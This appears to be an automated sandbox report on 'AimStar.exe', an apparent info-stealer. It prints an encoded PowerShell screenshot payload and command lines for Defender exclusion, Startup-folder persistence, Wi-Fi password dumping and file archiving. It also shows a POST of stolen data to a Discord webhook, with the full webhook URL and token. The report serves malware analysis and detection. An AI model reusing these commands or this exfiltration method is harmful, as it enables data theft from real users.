JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAA

Sigma detected: PowerShell Get-Clipboard Cmdlet Via CLI

Source: Process started

Author: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", CommandLine: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\AimStar.exe", ParentImage: C:\Users\user\Desktop\AimStar.exe, ParentProcessId: 7332, ParentProcessName: AimStar.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", ProcessId: 7652, ProcessName: cmd.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: SCR File Write Event

Source: File created

Author: Christopher Peacock @securepeacock, SCYTHE @scythe_io: Data: EventID: 11, Image: C:\Users\user\Desktop\AimStar.exe, ProcessId: 7332, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? .scr

Sigma detected: Startup Folder File Write

Source: File created

Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\AimStar.exe, ProcessId: 7332, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp

Sigma detected: Suspicious Execution of Powershell with Base64

Source: Process started

Sigma detected: Suspicious Screensaver Binary File Creation

Source: File created

Author: frack113: Data: EventID: 11, Image: C:\Users\user\Desktop\AimStar.exe, ProcessId: 7332, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? .scr

Sigma detected: Dynamic CSharp Compile Artefact

Source: File created

Author: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7444, TargetFilename: C:\Users\user\AppData\Local\Temp\hrvhwpsf\hrvhwpsf.cmdline

Sigma detected: Files Added To An Archive Using Rar.EXE

Source: Process started

Author: Timur Zinniatullin, E.M. Anhaus, oscd.community: Data: Command: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exe a -r -hp"sere" "C:\Users\user\AppData\Local\Temp\1KgHr.zip" *, CommandLine: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exe a -r -hp"sere" "C:\Users\user\AppData\Local\Temp\1KgHr.zip" *, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exe a -r -hp"sere" "C:\Users\user\AppData\Local\Temp\1KgHr.zip" *", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 8064, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exe a -r -hp"sere" "C:\Users\user\AppData\Local\Temp\1KgHr.zip" *, ProcessId: 7484, ProcessName: rar.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\AimStar.exe', CommandLine: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\AimStar.exe', CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\AimStar.exe'", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7392, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\AimStar.exe', ProcessId: 7524, ProcessName: powershell.exe

Data Obfuscation

Sigma detected: Dot net compiler compiles file from suspicious location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hrvhwpsf\hrvhwpsf.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hrvhwpsf\hrvhwpsf.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAA

Stealing of Sensitive Information

Sigma detected: Capture Wi-Fi password

Source: Process started

Author: Joe Security: Data: Command: C:\Windows\system32\cmd.exe /c "netsh wlan show profile", CommandLine: C:\Windows\system32\cmd.exe /c "netsh wlan show profile", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\AimStar.exe", ParentImage: C:\Users\user\Desktop\AimStar.exe, ParentProcessId: 7332, ParentProcessName: AimStar.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "netsh wlan show profile", ProcessId: 7952, ProcessName: cmd.exe

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: AimStar.exe	Virustotal: Detection: 36%			Perma Link
Source: AimStar.exe	ReversingLabs: Detection: 34%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.1% probability

Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exe

Code function: 88_2_00007FF71396901C CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,

88_2_00007FF71396901C

Source: AimStar.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source:	Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: AimStar.exe, 00000002.00000002.2416933625.00007FF8A81F7000.00000040.00000001.01000000.00000013.sdmp
Source:	Binary string: D:\a\1\b\libcrypto-3.pdb\| source: AimStar.exe, 00000002.00000002.2417417497.00007FF8A865A000.00000040.00000001.01000000.0000000F.sdmp
Source:	Binary string: D:\a\1\b\libssl-3.pdbDD source: AimStar.exe, 00000002.00000002.2421082833.00007FF8A9355000.00000040.00000001.01000000.00000010.sdmp
Source:	Binary string: 8C:\Users\user\AppData\Local\Temp\hrvhwpsf\hrvhwpsf.pdb source: powershell.exe, 00000039.00000002.2230160700.000002A6B83B5000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG"OpenSSL 3.0.15 3 Sep 20243.0.15built on: Wed Sep 4 15:52:04 2024 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-3"MODULESDIR: "C:\Program Files\OpenSSL\lib\ossl-modules"CPUINFO: N/Anot availableget_and_lock..\s\crypto\ex_data.cossl_crypto_get_ex_new_index_exossl_crypto_new_ex_data_exCRYPTO_dup_ex_dataCRYPTO_set_ex_dataOPENSSL_WIN32_UTF8..\s\crypto\getenv.ccompiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG";CPUINFO: OPENSSL_ia32cap=0x%llx:0x%llxOPENSSL_ia32cap env:%sos-specificC:\Program Files\Common Files\SSLC:\Program Files\OpenSSL\lib\ossl-modules.dllCPUINFO: ..\s\crypto\init.cOPENSSL_init_cryptoOPENSSL_atexit..\s\crypto\initthread.c..\s\crypto\mem_sec.cassertion failed: (bit & 1) == 0assertion failed: list >= 0 && list < sh.freelist_sizeassertion failed: ((ptr - sh.arena) & ((sh.arena_size >> list) - 1)) == 0assertion failed: bit > 0 && bit < sh.bittable_sizeassertion failed: TESTBIT(table, bit)assertion failed: !TESTBIT(table, bit)assertion failed: WITHIN_FREELIST(list)assertion failed: WITHIN_ARENA(ptr)assertion failed: temp->next == NULL \|\| WITHIN_ARENA(temp->next)assertion failed: (char *)temp->next->p_next == listassertion failed: WITHIN_FREELIST(temp2->p_next) \|\| WITHIN_ARENA(temp2->p_next)assertion failed: size > 0assertion failed: (size & (size - 1)) == 0assertion failed: (minsize & (minsize - 1)) == 0assertion failed: sh.freelist != NULLassertion failed: sh.bittable != NULLassertion failed: sh.bitmalloc != NULLassertion failed: !sh_testbit(temp, slist, sh.bitmalloc)assertion failed: temp != sh.freelist[slist]assertion failed: sh.freelist[slist] == tempassertion failed: temp-(sh.arena_size >> slist) == sh_find_my_buddy(temp, slist)assertion failed: sh_testbit(chunk, list, sh.bittable)assertion failed: WITHIN_ARENA(chunk)assertion failed: sh_testbit(ptr, list, sh.bittable)assertion failed: ptr == sh_find_my_buddy(buddy, list)assertion failed: ptr != NULLassertion failed: !sh_testbit(ptr, list, sh.bitmalloc)assertion failed: sh.freelist[list] == ptr/0123456789ABCDEFCRYPTO_memdup..\s\crypto\o_str.chexstr2buf_sepossl_hexstr2buf_sepbuf2hexstr_sepossl_buf2hexstr_sep..\s\crypto\packet.cwpacket_intern_init_lenWPACKET_start_sub_packet_len__..\s\crypto\param_build.cparam_pushparam_push_numOSSL_PARAM_BLD_push_BN_padNegative big numbers are unsupported for OSSL_PARAMOSSL_PARAM_BLD_push_utf8_stringOSSL_PARAM_BLD_push_utf8_ptrOSSL_PARAM_BLD_push_octet_stringOSSL_PARAM_BLD_p
Source:	Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: AimStar.exe, 00000000.00000003.2018153731.00000192BB8F0000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000002.00000002.2424874825.00007FF8BFAC4000.00000002.00000001.01000000.00000005.sdmp, VCRUNTIME140.dll.0.dr
Source:	Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG" source: AimStar.exe, 00000002.00000002.2417417497.00007FF8A85C2000.00000040.00000001.01000000.0000000F.sdmp
Source:	Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: AimStar.exe, 00000000.00000003.2018153731.00000192BB8F0000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000002.00000002.2424874825.00007FF8BFAC4000.00000002.00000001.01000000.00000005.sdmp, VCRUNTIME140.dll.0.dr
Source:	Binary string: D:\a\1\b\bin\amd64\sqlite3.pdb source: AimStar.exe, AimStar.exe, 00000002.00000002.2418977958.00007FF8A8751000.00000040.00000001.01000000.0000000B.sdmp
Source:	Binary string: D:\a\1\b\libcrypto-3.pdb source: AimStar.exe, AimStar.exe, 00000002.00000002.2417417497.00007FF8A865A000.00000040.00000001.01000000.0000000F.sdmp
Source:	Binary string: 8C:\Users\user\AppData\Local\Temp\hrvhwpsf\hrvhwpsf.pdbhPV source: powershell.exe, 00000039.00000002.2230160700.000002A6B83B5000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: D:\Projects\WinRAR\rar\build\rar64\Release\RAR.pdb source: rar.exe, 00000058.00000002.2319218457.00007FF7139C0000.00000002.00000001.01000000.0000001A.sdmp, rar.exe, 00000058.00000000.2307864420.00007FF7139C0000.00000002.00000001.01000000.0000001A.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\select.pdb source: AimStar.exe, AimStar.exe, 00000002.00000002.2424223799.00007FF8B9F61000.00000040.00000001.01000000.0000000D.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: AimStar.exe, AimStar.exe, 00000002.00000002.2423338250.00007FF8B8F71000.00000040.00000001.01000000.00000006.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: AimStar.exe, AimStar.exe, 00000002.00000002.2421608946.00007FF8B7DF1000.00000040.00000001.01000000.00000011.sdmp
Source:	Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WA source: AimStar.exe
Source:	Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: AimStar.exe, 00000002.00000002.2423019564.00007FF8B8B3B000.00000040.00000001.01000000.00000008.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: AimStar.exe, AimStar.exe, 00000002.00000002.2423964051.00007FF8B9841000.00000040.00000001.01000000.00000012.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: AimStar.exe, 00000002.00000002.2423019564.00007FF8B8B3B000.00000040.00000001.01000000.00000008.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: AimStar.exe, AimStar.exe, 00000002.00000002.2423705275.00007FF8B93C1000.00000040.00000001.01000000.00000009.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: AimStar.exe, AimStar.exe, 00000002.00000002.2422349344.00007FF8B7E51000.00000040.00000001.01000000.0000000C.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_sqlite3.pdb source: AimStar.exe, AimStar.exe, 00000002.00000002.2422715924.00007FF8B8AF1000.00000040.00000001.01000000.0000000A.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\python313.pdb source: AimStar.exe, 00000002.00000002.2419478466.00007FF8A8CD9000.00000040.00000001.01000000.00000004.sdmp
Source:	Binary string: D:\a\1\b\libssl-3.pdb source: AimStar.exe, AimStar.exe, 00000002.00000002.2421082833.00007FF8A9355000.00000040.00000001.01000000.00000010.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: AimStar.exe, AimStar.exe, 00000002.00000002.2421997867.00007FF8B7E11000.00000040.00000001.01000000.0000000E.sdmp

Source: C:\Users\user\Desktop\AimStar.exe	Code function: 0_2_00007FF710F492F0 FindFirstFileExW,FindClose,	0_2_00007FF710F492F0
Source: C:\Users\user\Desktop\AimStar.exe	Code function: 0_2_00007FF710F483B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	0_2_00007FF710F483B0
Source: C:\Users\user\Desktop\AimStar.exe	Code function: 0_2_00007FF710F618E4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,	0_2_00007FF710F618E4
Source: C:\Users\user\Desktop\AimStar.exe	Code function: 2_2_00007FF710F492F0 FindFirstFileExW,FindClose,	2_2_00007FF710F492F0
Source: C:\Users\user\Desktop\AimStar.exe	Code function: 2_2_00007FF710F483B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	2_2_00007FF710F483B0
Source: C:\Users\user\Desktop\AimStar.exe	Code function: 2_2_00007FF710F618E4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,	2_2_00007FF710F618E4
Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exe	Code function: 88_2_00007FF7139746EC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,	88_2_00007FF7139746EC
Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exe	Code function: 88_2_00007FF71396E21C FindFirstFileW,FindClose,CreateFileW,DeviceIoControl,CloseHandle,	88_2_00007FF71396E21C
Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exe	Code function: 88_2_00007FF7139B88E0 FindFirstFileExA,	88_2_00007FF7139B88E0

Source: C:\Users\user\Desktop\AimStar.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\fi\	Jump to behavior

Source: global traffic

TCP traffic: 192.168.2.5:53656 -> 162.159.36.2:53

Source: Joe Sandbox View	IP Address: 208.95.112.1 208.95.112.1
Source: Joe Sandbox View	IP Address: 162.159.128.233 162.159.128.233

Source: unknown	DNS query: name: ip-api.com
Source: unknown	DNS query: name: ip-api.com

Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comAccept-Encoding: identityUser-Agent: python-urllib3/2.3.0
Source: global traffic	HTTP traffic detected: GET /json/?fields=225545 HTTP/1.1Host: ip-api.comAccept-Encoding: identityUser-Agent: python-urllib3/2.3.0

Source: AimStar.exe, 00000002.00000002.2415391587.000002020DB20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: `https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: AimStar.exe, 00000002.00000002.2415391587.000002020DB20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: `https://www.youtube.com/ equals www.youtube.com (Youtube)

Source: global traffic	DNS traffic detected: DNS query: skoch-6bauu.in
Source: global traffic	DNS traffic detected: DNS query: ip-api.com
Source: global traffic	DNS traffic detected: DNS query: discord.com

Source: unknown

HTTP traffic detected: POST /api/webhooks/1323748851462705204/cFp6eq42ADGLAf_FT0MA15Miw7tWNx5rwD4SKkxk-ZhCNApYaj_fZlIRRuECNHrQlsm0 HTTP/1.1Host: discord.comAccept-Encoding: identityContent-Length: 726812User-Agent: python-urllib3/2.3.0Content-Type: multipart/form-data; boundary=156af1f13d18752ec77c0725b357aa90

Source: global traffic

